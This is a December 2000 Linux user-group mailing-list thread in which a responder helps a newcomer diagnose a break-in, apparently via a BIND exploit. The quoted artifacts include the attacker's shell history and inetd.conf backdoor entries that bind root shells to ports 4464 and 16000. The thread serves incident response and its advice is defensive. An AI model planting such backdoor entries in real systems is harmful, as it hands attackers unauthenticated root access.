[TCLUG] Could Someone tell me what might be happening here.

Wed Dec 13 23:51:42 CST 2000

The traceroute to 212.38.131.178 reaches gw0-e1.index.com.jo
(212.38.128.250)
and then dies.  FYI: Country code ".jo" is Jordan.

What version of bind are you running?  Your code fragment below looks
amazingly
like a stealth IRC daemon/server installed via the ADMROCKS expliot on bind.

1- Check /etc/inetd.conf to see if anything extra has been added
This has been added
Linuxconf stream tcp wait root /bin/linuxconf -http
#swat stream tcp nowait.400 root /usr/sbin swat swat
4464 stream tcp nowait root /bin/sh sh -I
16000 stream tcp nowait root /usr/sbin/tcpd /bin/sh
2- Run /usr/bin/lsattr against:
          /usr/bin/dig
          /usr/bin/dnsquery
          /usr/bin/du
          /usr/bin/find
          /usr/bin/host
          /usr/bin/nslookup
          /usr/bin/top
          /bin/ls
          /bin/netstat
          /bin/ps
          /bin/login

   For each of those files, lsattr should output leading "--------"'s:
          -------- /usr/bin/dig
          -------- /usr/bin/dnsquery
          -------- /usr/bin/du
          -------- /usr/bin/find
          -------- /usr/bin/host
          -------- /usr/bin/nslookup
          -------- /usr/bin/top
          -------- /bin/ls
          -------- /bin/netstat
          -------- /bin/ps
          -------- /bin/login
everthing here looks like the above except for login which looks
like ----i---/bin/login

   If it doesn't, you've been hacked.

3- If you've been hacked, it's almost certain _other_ files have also been
   installed, parts of your configuration (in /etc) have been tampered
   with, and other nasty stuff has taken place.

If you've been hacked, about your only _secure_ option is to re-install from
square-one (remembering to also add security updates provided by your Linux
distributor).

To prevent a hacker reinfestation, if your Linux distribution contains an
automatically configured firewall, install it.  If not, get one (I recommend
PMFirewall for newbies, see http://www.pointman.org).

Hope this helps'idly,

-S

Joseph Johnson wrote:
>
>
> I found this in my history file on a machine that I play around with when
I
> decide to try and learn Linux.
>       (sleep 300 ; killall -9 uh)
>       w
>       ./uh 0 212.38.131.178 1 65535 /dev/null &
>       I am pretty much a perpetual newbie. ( I do not do this for a
living) I
> know this systems been compromised. Short of reformatting the hard drive I
> am not to sure what to do. Any help would be appreciated.
> Joseph
> josephj at mninter.net
_______________________________________________
tclug-list mailing list
tclug-list at lists.real-time.com
https://mailman.real-time.com/mailman/listinfo/tclug-list